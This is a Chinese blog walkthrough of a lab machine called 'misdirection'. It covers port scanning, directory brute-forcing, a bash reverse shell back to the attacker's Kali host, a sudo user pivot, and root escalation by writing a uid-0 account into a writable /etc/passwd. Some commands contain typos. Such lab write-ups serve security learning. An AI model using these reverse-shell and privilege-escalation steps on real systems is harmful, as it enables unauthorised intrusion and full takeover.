首页 > 其他分享 >misdirection --攻击面选择与信息收集的重要性

misdirection --攻击面选择与信息收集的重要性

时间:2023-05-03 18:11:29浏览次数:70  
标签:bin shell -- sudo 192.168 misdirection etc bash 攻击面

主机发现

sudo nmap -sn 192.168.25.0/24    34

sudo nmap -sT --min-rate 10000 -p- 192.168.25.34 -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p 192.168.25.34 -oA nmapscan/detial

sudo nmap -sU --top-rate 20 192.168.25.34 -oA nmapscan/udp

sudo nmpa --script=vuln -p 192.168.25.34 -p22,80,3306,8080 -oA nmapscan/vuln

对http服务进行探测

访问主页80获得敏感信息

电子投票系统/power by web2py  

web2py并不是一个大型的网站,但是页面也很多吗,供给面的选择要通过浏览后挑选

并进行目录爆破

sudo dirb -u xx 

访问8080端口查看敏感信息 是apache的默认页

目录爆破

sudo dirb -u http:/xx:8080 -w 

爆破出一个shell页面,能够进行shell的连接

查看shell权限

whoami   id   ip a   sudo -l   uname -a

尝试能否用bash进行反弹shell到kali上

bash -c "/bin/bash -i >& /dev/tcp/192.168.28.29/1234 0>&1"

kali监听

nc -lvnp 1234

成功getshell

查看家目录是否有flag

查看计划任务cat /etc/crontab

sudo -l

 这意味着用户"brexit"被授权在不需要输入密码的情况下执行"/bin/bash"命令。也就是说,该用户可以在终端中直接使用sudo执行"/bin/bash",而不需要再输入密码。

所以直接切换用户  sudo -u brexit /bin/bash

但是因为shell的交互性不好导致执行不成功

完善shell的交互性

python -c "import pty;pty.spawn('/bin/bash')"

再查找家目录和网站/var/www/html还有计划任务卡看是否有能够利用的root权限运行的脚本进行提权

查看历史命令

.bash_history

.viminfo等

在.viminfo查看到一个对/etc/passwd进行了操作,查看/etc/passwd的权限

ls -liah /etc/passwd 

利用brexit用户添加一个用户即可

openssl passwd -l 123456

查看root用户格式

cat /etc/passwd 

根据格式自定义一个用户

red:$1$p.xsdfawerwer :0:0:root:/root:/bin/bash

复制到/etc/passwd中

保存后

通过su red进入到red用户显示的是root用户

 

标签:bin,shell,--,sudo,192.168,misdirection,etc,bash,攻击面
From: https://www.cnblogs.com/lisenMiller/p/17369482.html

相关文章

  • SpringBoot定义优雅全局统一Restful API 响应框架二
    这里解决之前留下来的问题,当程序没有正常返回时候就是程序由于运行时异常导致的结果,有些异常我们可,能无法提前预知,不能正常走到我们return的R对象返回。这个时候该如何处理在SpringBoot中,可以使用@ControllerAdvice注解来启用全局异常处理。通过使用@ControllerAdvice注解,可以捕......
  • Ruby安装错误:in `encode': U+00CD to IBM437 in conversion from UTF-16LE to UTF-8 t
    解决方法:去本地路径下修改编码,这么提示是因为编码不一致导致的。  修改registry文件中的编码:  修改后就没有问题了。 来源:https://www.cnblogs.com/py-tiger/p/5372258.html......
  • Linux xargs 命令
    xargs是一个强有力的命令,是自动化必须掌握的命令xargs通awk命令一样Linuxxargs命令xargs(英文全拼:eXtendedARGuments)是给命令传递参数的一个过滤器,也是组合多个命令的一个工具。xargs可以将管道或标准输入(stdin)数据转换成命令行参数,也能够从文件的输出中读取数据。xarg......
  • 有关成都当地品茶喝茶习惯以工作室甚得大家偏爱
    关于品茶源自于工作室在魏殿130年,经过吴佧8807代人和长达扣1002年的不断发掘与传承才有了茶的文化。茶是一种对人体十分有益的饮品,喝茶是我国的一个悠久习俗,我国西北地区的少数民族更是有“宁可三日无粮,不可一日无茶”的说法。在我国,不少人将茶奉为养生之水,正如宋代诗人欧阳修《......
  • 【题解】ABC300 F,G
    F.MoreHolidays题目分析:考虑刻画一下我们选择是什么样子的。考虑我们最后选择的\(T\)中的一段一定是形如:一个完整的S选择一个后缀\(+\)若干个完整的S\(+\)一个完整的S的前缀。这样的话就启示我们直接枚举这个前后缀选择的是什么,然后就可以很快算出来了,但是枚举前......
  • 开发一款提高效率工作的命令行程序
    开发工作中我们常用到"时间戳和时间"、"生成guid"、"模拟身份证号",来模拟数据校验和显示;每一次都去找在线工具,确实可以,但我觉得挺麻烦,于是乎想到了自定义一个命令行。目前我已经实现以下功能:Usage:[options]Options:-?|-aboutShowhelpinformation.-ts-now当......
  • AI 作画火了,如何用 Serverless 函数计算部署 Stable Diffusion?
    作者:寒斜立即体验基于函数计算部署StableDiffusion:https://developer.aliyun.com/topic/aigcAIGC领域目前大火,除了Chatgpt,在文生图领域StableDiffusion大放异彩,深刻的地影响着绘画、视频制作等相关领域。利用这项技术,普通人也可以制作出令人惊叹的艺术作品。今天我们将......
  • Linux ip 命令
    Linuxip命令Linuxip命令与ifconfig命令类似,但比ifconfig命令更加强大,主要功能是用于显示或设置网络设备。ip命令是Linux加强版的的网络配置工具,用于代替ifconfig命令。语法ip[OPTIONS]OBJECT{COMMAND|help}OBJECT为常用对象,值可以是以下几种:OBJECT={......
  • [c++]从完全不会到似懂非懂
    1.指针1.1指针常量使用int*constp=&a;的模式,指针常量是常量,所以p对应的常量为a的地址,因此a可变,但地址不可变。1.2常量指针使用constint*p=&a的模式,其实这里和const无关,p只是个指针,该指针的类型是constint类型,因此p可以修改指针指向其他的constint类型,但无法修改......
  • 关于如何使用pandas将不同的数据写入到同一个Excel的不同Sheet表中
    笔者在之前使用python将数据写入到Excel表格中,一般都只需要写入一张Sheet表中就可以了因最近一个小的需求,需要将不同的大列表数据写入到不同的Sheet表中这样,再使用之前的pandas.DataFrame(content_list),然后.to_excel("./xxxxx.xlsx")就不再好用了于是笔者又去看了一个pandas......